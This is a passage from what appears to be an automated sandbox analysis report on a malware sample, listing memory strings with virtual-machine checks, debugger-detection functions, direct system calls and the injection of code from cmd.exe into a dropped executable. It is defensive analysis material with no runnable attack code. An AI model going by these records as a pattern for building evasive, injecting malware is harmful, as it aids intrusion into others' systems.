                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: aVmNetRx
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000041C000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202511556.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202888428.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.0000000000499000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: The service was disabled on the host. Returned by pfnInit in VBoxService to indicated a non-fatal error that should results in the particular service being disabled.
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: VBoxGuestPropSvc.dll
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: /VBoxGuestAdditions.iso
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: Given default machine Guest Additions ISO file '%s' does not existGiven default machine Guest Additions ISO file '%s' is not fully qualifiedCannot determine default Guest Additions ISO location. Most likely they are not available%s/VBoxGuestAdditions_%ls.iso/additions/VBoxGuestAdditions.iso/VBoxGuestAdditions.iso
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: Importing virtual disk image '%s'Could not find a valid medium format for the source disk '%s'http://www.vmware.com/interfaces/specifications/vmdk.html#compressedhttp://www.vmware.com/specifications/vmdk.html#compressedVDICreating disk image '%s'%s%c%sCould not find a valid medium format for the target disk '%s'"
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: AdditionsFacilityType_VBoxGuestDriverWWW
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: !0R4AdditionsFacilityType_VBoxServiceWWW
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: VBoxGuestControlSvc.dll
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/specifications/vmdk.html#compressed
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: IOCtl to VBoxGuest driver failed.
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: VBoxTray.exe
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/specifications/vmdk.html#sparse
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: Virtual HDD is not opened.
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: VBoxTray.exeexplorer.exeint __cdecl rtProcWinCreateAsUser1(unsigned short *,unsigned short *,unsigned short *,unsigned short *,struct RTENVINTERNAL *,unsigned long,struct _STARTUPINFOW *,struct _PROCESS_INFORMATION *,unsigned int)pfnCreateProcessWithLogonW (%p) failed: dwErr=%u (%#x), rc=%Rrc
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2202511556.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202888428.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.0000000000499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/interfaces/specifications/vmdk.html#compressed
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: b!0R4AdditionsFacilityType_VBoxServiceWWW
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6665BAC4 rdtsc 2_2_6665BAC4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089E88A
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E231400 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_6E231400
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A48D8 mov eax, dword ptr fs:[00000030h]0_2_008A48D8
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D348D8 mov eax, dword ptr fs:[00000030h]1_2_00D348D8
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0087394F GetProcessHeap,RtlAllocateHeap,0_2_0087394F
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0089E3D8
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089E88A
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089E9DC SetUnhandledExceptionFilter,0_2_0089E9DC
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008A3C76
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D2E3D8
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D2E88A
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2E9DC SetUnhandledExceptionFilter,1_2_00D2E9DC
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D33C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D33C76
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665E6BB0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,__crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,__crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_665E6BB0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666B06B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_666B06B0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666B02A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_666B02A4

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0x7FFDFB329635
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQuerySystemInformation: Direct from: 0x7FF69E3C6203
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x14011D93E
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FF69E535663
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQuerySystemInformation: Direct from: 0x7FF69E45E26B
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtRequestWaitReplyPort: Direct from: 0x7FF69E466D34
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtClose: Direct from: 0xAF0E30
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryAttributesFile: Direct from: 0x7FF6AB8AA87D
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0x110
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtCreateFile: Direct from: 0x7FF6AB9703E5
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Indirect: 0x14012000F
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E3CF21C
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E3AFF06
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtCreateFile: Direct from: 0x7FF6AB80A602
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryInformationToken: Direct from: 0x7FF69E4235D8
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryInformationToken: Direct from: 0x7FF69E3CA02E
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtProtectVirtualMemory: Direct from: 0x7FFDFAEF94F5
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtClose: Direct from: 0x78FB90
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E534462
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FFE221C26A1
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FF69E535671
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0xA0A76ACB
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQuerySystemInformation: Direct from: 0x7FF69E3C9664
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryAttributesFile: Direct from: 0x7FF6AB7FC002
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtClose: Direct from: 0x2
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtProtectVirtualMemory: Direct from: 0x3
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0x78BC70
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtCreateNamedPipeFile: Direct from: 0x8000000
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQuerySystemInformation: Direct from: 0x7FF69E3BC002
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x14011D808
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E53DA8E
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | NtQuerySystemInformation: Direct from: 0xEFC1A0
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FF69E31A949
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtCreateFile: Direct from: 0x230E4B3
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FF69E3CCA0F
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtDeviceIoControlFile: Direct from: 0x7FF6AB869691
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E533508
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0x2F
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E53C195
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0xAECE40
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtProtectVirtualMemory: Direct from: 0x7FFDFB3294F5
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FF69E53564F
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FF6AB975663
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E42AA63
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtCreateFile: Direct from: 0x277E4B3
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtCreateFile: Direct from: 0x7FF69E3CA602
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FF6AB97564F
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FF6AB7EFF06
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtSetInformationProcess: Direct from: 0x7FF69E3D0C7D
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0x7FFDFAEF9635
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtReadVirtualMemory: Direct from: 0x7FF69E3C6B83
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0x40
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryAttributesFile: Direct from: 0x7FF6AB86AA63
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtDeviceIoControlFile: Direct from: 0x7FF69E429691
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryAttributesFile: Direct from: 0x7FF6AB8A6D34
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtCreateFile: Direct from: 0x7FF69E533AF4
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryValueKey: Direct from: 0x7FF69E3EDCEB
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FF69E3160A1
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtReadFile: Direct from: 0x7FF6AB80A809
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtSetInformationProcess: Direct from: 0x7FF69E3D200D
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x14011D864
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5E
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryVolumeInformationFile: Direct from: 0x7FF6AB811681
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtCreateFile: Direct from: 0x2ADE4B3
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtQuerySystemInformation: Direct from: 0x7FFDFAEE2143
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryValueKey: Direct from: 0x7FF69E3EE4D8
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtCreateThreadEx: Direct from: 0x7FF69E316400
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FF69E3D1681
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtClose: Direct from: 0xF133A0
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQuerySystemInformation: Direct from: 0x7FF69E538749
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E53DB66
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtQuerySystemInformation: Direct from: 0x7FFDFB312143
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E3C62C4
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FF69E3C4E67
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FF6AB974462
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtClose: Direct from: 0x7FF6AB975671
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0x7FFDFB328E14
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FF69E5345E9
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtCreateFile: Direct from: 0x7FF69E5303E5
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryValueKey: Direct from: 0x7FF69E3EE14E
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FF69E42AAAB
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0x7FFDFAEF8E14
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtAllocateVirtualMemory: Direct from: 0xF0B610
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryAttributesFile: Direct from: 0x7FF6AB80A02E
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryAttributesFile: Direct from: 0x7FF6AB8635D8
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtReadFile: Direct from: 0x14011D832
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtCreateFile: Direct from: 0x7FF6AB973AF4
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtQuerySystemInformation: Direct from: 0x7FFD40CB21D3
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryInformationProcess: Direct from: 0x7FF69E3C0C96
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryAttributesFile: Direct from: 0x7FF6AB809664
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E3BC747
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtCreateFile: Direct from: 0x14011D7A4
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtReadFile: Direct from: 0x7FF69E3CA809
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x7FF69E425B12
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryInformationToken: Direct from: 0x7FF69E46A87D
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtOpenKeyEx: Direct from: 0x7FF69E3ED508
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryValueKey: Direct from: 0x7FF69E3EE5ED
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtQueryInformationProcess: Direct from: 0x7FF69E3D0D55
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | NtProtectVirtualMemory: Direct from: 0x6C006C
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtProtectVirtualMemory: Direct from: 0x7FF69E5334D0
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | NtAllocateVirtualMemory: Direct from: 0x140120A3C
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe protection: read write
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe protection: read write
                  Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe base: 14011BC08
                  Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe base: 207010
                  Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe base: 14011BC08
                  Source: C:\Windows\SysWOW64\cmd.exe | Memory written: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe base: 2F4010
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Process created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe "C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_008B1719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_008B1719
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_008B3A5F AllocateAndInitializeSid,CheckTokenMembership,0_2_008B3A5F
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_0089EC07 cpuid 0_2_0089EC07
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe | Code function: ___lc_handle_func,GetLocaleInfoW,2_2_665D9460
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                  Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_00884EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_00884EDF
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_00876037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,0_2_00876037
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_008761DF GetUserNameW,GetLastError,0_2_008761DF
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_008B887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_008B887B
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exe | Code function: 0_2_00875195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,0_2_00875195
